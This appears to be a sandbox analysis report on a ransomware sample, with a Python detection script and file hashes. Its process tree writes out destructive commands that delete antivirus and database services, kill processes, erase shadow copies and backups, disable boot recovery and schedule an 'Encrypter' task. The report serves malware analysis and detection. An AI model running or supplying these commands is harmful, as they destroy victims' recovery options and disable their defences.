C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE4⤵
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt3⤵
-
C:\Users\Admin\AppData\Roaming\norapid.exeC:\Users\Admin\AppData\Roaming\norapid.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "storflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "WRSVC"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klim6"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klpd"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klhk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "kltap"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE4⤵
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt3⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5781⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\!files-recovery.txt1⤵
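Everything norapid.exe spawns above is one batch-style sequence: remove Hyper-V, SQL and AV services with sc delete, kill database processes with taskkill, probe for security products with tasklist | find, wipe recovery state (vssadmin, wmic shadowcopy, wbadmin, bcdedit), then re-persist through schtasks. The script below is an added example, not part of this report or of the sample, showing how to flag that sequence from Sysmon Event ID 1 style process-creation records: single-command rules for the recovery-inhibition, persistence and discovery commands, plus a per-parent burst heuristic for the sc delete / taskkill storm, which a lone administrative command does not trip. The event records, timestamps, process IDs (including the 3588 parent) and the burst threshold are constructed for the example.

```python
"""Flag the pre-encryption sequence seen in the process tree above from
Sysmon Event ID 1 style process-creation records.

Added example for this report; the events, PIDs and thresholds below are
constructed, not taken from the sandbox run."""
import re
from collections import defaultdict, namedtuple

Finding = namedtuple("Finding", "time pid technique")

# Single-command signatures, matched case-insensitively against the command line.
# Technique IDs use current ATT&CK sub-technique numbering.
RULES = [
    ("T1490 Inhibit System Recovery: shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490 Inhibit System Recovery: system state backup deleted",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+systemstatebackup", re.I)),
    ("T1490 Inhibit System Recovery: boot recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1053.005 Scheduled Task: task action points into a user profile",
     re.compile(r"schtasks(\.exe)?.*?/create.*?/tr\s+\S*\\appdata\\", re.I)),
    ("T1518.001 Security Software Discovery: tasklist probe for an AV process",
     re.compile(r'tasklist\s+/fi\s+"imagename\s+eq\s+[^"]+"\s*\|\s*find', re.I)),
]

# Burst heuristics: a lone 'sc delete' or 'taskkill /f' is routine administration;
# dozens from one parent within a minute is the loop shown above.
SC_DELETE = re.compile(r'\bsc(\.exe)?\s+delete\s+"?(?P<target>[^"\s]+)"?', re.I)
TASKKILL = re.compile(r"\btaskkill(\.exe)?\s+[-/]f\s+[-/]im\s+(?P<target>\S+)", re.I)
BURSTS = [
    ("T1489 Service Stop / T1562.001 Impair Defenses: 'sc delete' burst", SC_DELETE),
    ("T1489 Service Stop: 'taskkill /f' burst", TASKKILL),
]


def _burst(hits, threshold, window):
    """First run of (time, target) hits with at least `threshold` entries inside `window` seconds."""
    hits = sorted(hits)
    for i, (t0, _) in enumerate(hits):
        chunk = [h for h in hits[i:] if h[0] - t0 <= window]
        if len(chunk) >= threshold:
            return chunk
    return []


def detect(events, burst_threshold=5, window_seconds=60):
    """events: iterable of (time_seconds, pid, ppid, image, command_line). Returns sorted Findings."""
    findings = []
    per_parent = {label: defaultdict(list) for label, _ in BURSTS}  # label -> ppid -> [(t, target)]
    for t, pid, ppid, _image, cmdline in events:
        for technique, rx in RULES:
            if rx.search(cmdline):
                findings.append(Finding(t, pid, technique))
        for label, rx in BURSTS:
            m = rx.search(cmdline)
            if m:
                per_parent[label][ppid].append((t, m.group("target")))
    for label, table in per_parent.items():
        for ppid, hits in table.items():
            burst = _burst(hits, burst_threshold, window_seconds)
            if burst:
                targets = ", ".join(sorted({name for _, name in burst}))
                findings.append(Finding(burst[0][0], ppid,
                                        f"{label} from parent {ppid}: {len(burst)} in "
                                        f"{window_seconds}s ({targets})"))
    return sorted(findings)


# Constructed sample: a norapid.exe-style parent (pid 3588 assumed) and its cmd.exe children,
# followed by benign admin activity that must not fire.
SAMPLE_EVENTS = [
    (0, 3588, 1234, r"C:\Users\Admin\AppData\Roaming\norapid.exe", r"C:\Users\Admin\AppData\Roaming\norapid.exe"),
    (1, 4001, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "vmicvss"'),
    (1, 4002, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"'),
    (2, 4003, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"'),
    (2, 4004, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "ekrn"'),
    (3, 4005, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "WRSVC"'),
    (4, 4006, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe'),
    (5, 4007, 3588, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender'),
    (6, 4008, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet'),
    (7, 4009, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No'),
    (8, 4010, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP'),
    (9, 4011, 3588, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE'),
    (10, 4012, 3588, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe'),
    (500, 5001, 900, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" sc delete "LegacyPrintHelper"'),
    (501, 5002, 900, r"C:\Windows\System32\schtasks.exe", r'schtasks /Create /SC DAILY /TN NightlyBackup /TR "C:\Program Files\Backup\backup.exe"'),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"t={f.time:>3}s pid={f.pid} {f.technique}")
```

Two caveats when wiring this into a real pipeline. The tree above shows the same command on both the cmd.exe wrapper and the child it launches (the cmd.exe /c vssadmin row and the vssadmin.exe row beneath it), so a single action can satisfy a rule twice; deduplicate on the parent/child pair before alerting. The burst threshold of five in sixty seconds is a starting point for the storm seen here (sixty-odd sc delete calls in a few seconds); tune it against your own change-management noise, since a server decommissioning script can legitimately delete a handful of services.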
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\434TNJ1GSG.covid
MD5    aa85650cb26c5f98a7ce7916ac821a11
SHA1   23b0e998f6bcd656c93d71845872e698bd850ee2
SHA256 4a89fc627df8c7b1876add49266a8581b824a06802ef5efa60f3ed59a626e2a0
SHA512 2540a3c650c8c0b814465b6a4fc5c2d05001fb5bc91efbc378ed68f403640b135ae7378baf292a29cbb60269344713da2970db7ba70cc18ed1ac1d17d4619755

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\IML5HAY764.covid
MD5    d5264102ecc33527ef7291b58f7aa225
SHA1   ece9907384e0a401e6492bed46cf98568362e899
SHA256 0b137456be947d8d9f2ff075780e9bcc0f5c48bad9f860312afd6bcb1f8dabf4
SHA512 0f080d2c9056df1070e399284701b48d34388ef3179c71c9547a8bcab423db85dc3594d013d0feeec86d8d30dd041de67eb12fd60ea393b4133a937af8892cec

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\ZW1JJEE1JA.covid
MD5    b2645f4505f0b0820204c6339309957c
SHA1   dbbf269cbcf989e684782fe189ec74ece210af4c
SHA256 c9ccd9aaf653799dd29c47195b787f56b7dd64c5f57b82dc2d63e81f7fdb8008
SHA512 08638285092e85b179ba90d403b38f1c0aa16121c81025bc6d3c2ebda8cdfadcd8518dc92b66ffe0e78da54ed059960bde4b7576db8e527125c16199f9c38343

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\ZXGRCG3WKI.covid
MD5    617dcdd855ef9fd95700df2965f9f56b
SHA1   1104f24ee9c507e1df7b9b908e286d9d69f7ca6b
SHA256 328270ad285a26c7ebb03eca3a7a803bd5a3ffabf14ca33b7fedb7824bd51b23
SHA512 7a40de177b2571c034f5cca3e29e6ad061fade2d6992f5fc83c780b49668e2037555714c8c5ccd38eaf6a67ea79543793440d9dadc8ce2a1fddb049c5c7fa6f8

C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\5YAIZ5QT3X.covid
MD5    ac8e4b6d704dddb7b83ced4bf7051569
SHA1   7440f056ec5e3d6a915a6d3b1dfff253f0a6ddef
SHA256 969e1bbee94e0f69cf2caac05ffc5583161a8913c1e2c368d043bf7a84d7a35f
SHA512 5f699140b7b22dc68ca823ffea496450df2a1e256cab6b91279cb538dad5d47527a61b1ffad74d5ef85b6d6bb3063a0b5b7fe4f21377d79fb54a047030540c3d

C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\O3J71568VP.covid
MD5    e9fd23dcd136a199c4f068ed8f4f66bf
SHA1   37e6ddcfbcca8f3ebe7057289ee4332528c9075b
SHA256 db2fd3ae683033cae6f83cf3db666d5853148ea4350fc358cf1023fa8b938dda
SHA512 7ad25ca94e63d129a42e91826fc486a8179708cb031a64fe31b9785e0fbc8c7465e604e93d7f31e797dbc0dda8d0a6dc32c70f8645af0f0291b3b98b43654949

